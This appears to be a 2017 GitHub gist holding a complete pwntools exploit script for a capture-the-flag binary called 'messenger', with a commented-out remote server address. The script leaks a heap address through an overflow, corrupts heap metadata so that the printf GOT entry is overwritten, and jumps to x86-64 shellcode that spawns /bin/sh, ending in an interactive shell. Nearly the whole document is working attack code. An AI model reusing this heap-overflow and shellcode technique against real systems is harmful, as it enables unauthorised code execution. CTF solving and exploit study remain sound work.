@crixpwn
Created February 15, 2017 06:13
from pwn import *
from hexdump import *
import time
# Global pwntools tube every helper below talks to: a local instance of the
# ``messenger`` binary started from the current directory.
p = process("./messenger")
# Remote variant kept by the author; left commented out.
#p = remote("110.10.212.137", 3334)
def leave(size, data):
    """Create a message through the ``L`` menu entry.

    Sends the menu letter, then ``size``, then ``data`` as three separate
    lines.  A 0.1 s pause follows each of the first two lines; none follows
    the data line.  Returns once the ``>> `` prompt has been read back.

    Args:
        size: size field, already formatted as a string.
        data: message body.
    """
    for prefix in ("L", size):
        p.sendline(prefix)
        time.sleep(0.1)
    p.sendline(data)
    p.recvuntil(">> ")
def view(idx):
    """Select the ``V`` menu entry for slot ``idx`` and read up to ``"index : "``.

    Only the text up to and including the ``index : `` marker is consumed;
    whatever the program prints after it is left in the tube for the caller
    (see ``heap_leak``).

    Args:
        idx: slot index, already formatted as a string.
    """
    p.sendline("V")
    time.sleep(0.1)
    p.sendline(idx)
    p.recvuntil("index : ")
def change(idx, data):
    """Rewrite the message in slot ``idx`` through the ``C`` menu entry.

    The size line is derived from the payload as ``len(data) + 1``.  A 0.1 s
    pause follows the menu letter and the size line; none follows ``idx`` or
    the data line.  Returns once the ``>> `` prompt has been read back.

    Args:
        idx: slot index, already formatted as a string.
        data: new message body.
    """
    new_size = str(len(data) + 1)
    steps = (
        ("C", True),
        (idx, False),
        (new_size, True),
        (data, False),
    )
    for line, pause in steps:
        p.sendline(line)
        if pause:
            time.sleep(0.1)
    p.recvuntil(">> ")
def remove(idx):
    """Select the ``R`` menu entry for slot ``idx``.

    Unlike the other helpers, the final prompt read uses a 0.1 s timeout
    instead of blocking, so this returns even if ``>> `` is never printed
    again.

    Args:
        idx: slot index, already formatted as a string.
    """
    p.sendline("R")
    time.sleep(0.1)
    p.sendline(idx)
    p.recvuntil(">> ", timeout=0.1)
def heap_leak():
    """Fill slot 0 with 55 bytes of ``A`` and parse the bytes echoed after it.

    Returns:
        int: the three bytes following the filler, decoded as a little-endian
        32-bit value (a zero byte is appended to reach four bytes) with the
        low byte cleared via ``& ~0xff``.
    """
    payload = "A" * 55
    change("0", payload)
    view("0")
    # Consume the echoed filler, then one more byte that is discarded
    # (presumably a separator or terminator; not confirmed here).
    p.recvuntil("A" * 55)
    p.recv(1)
    # u32 needs exactly four bytes; only three are read from the tube.
    heap_base = u32(p.recv(3) + "\x00")
    heap_base = heap_base & ~0xff
    log.info("heap_base: " + hex(heap_base))
    p.recvuntil(">> ")
    return heap_base
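def pwn(heap_base):
    """Write the final payload into slot 0, remove slot 1 and hand over the tube.

    Args:
        heap_base: value returned by ``heap_leak()``; it is offset by 0x80
            and embedded as one of the pointer-sized fields of the payload.

    Side effects:
        Drives the global ``p`` tube and ends in ``p.interactive()``, which
        blocks until the interactive session is closed.

    Fix over the original: the menu call after ``change`` was spelled
    ``removte``, a NameError raised before ``p.interactive()`` was reached.
    The unused local ``bss`` has been dropped.
    """
    shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
    printf = 0x602028
    # Payload layout reproduced byte-for-byte from the original; the meaning
    # of the individual fields is not documented in the source.
    payload = "".join((
        "\x90" * 32,
        "\x00" * 16,
        p64(0x49),
        p64(printf - 0x10),
        p64(heap_base + 0x80),
        p64(0),
        "\xeb\x16\x00\x00\x00\x00",
        "\x90" * 100,
        shellcode,
    ))
    change("0", payload)
    remove("1")
    p.interactive()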
def main():
    """Drive the whole session: wait for the prompt, create two slots, leak, pwn.

    Slot 0 is filled with 31 ``A`` bytes and slot 1 with 31 ``B`` bytes, both
    created with a size field of ``"32"``; the leaked value is then passed
    straight to ``pwn``.
    """
    p.recvuntil(">> ")
    for filler in ("A", "B"):
        leave("32", filler * 31)
    pwn(heap_leak())
# Script entry point; nothing runs on import.
if __name__ == "__main__":
    main()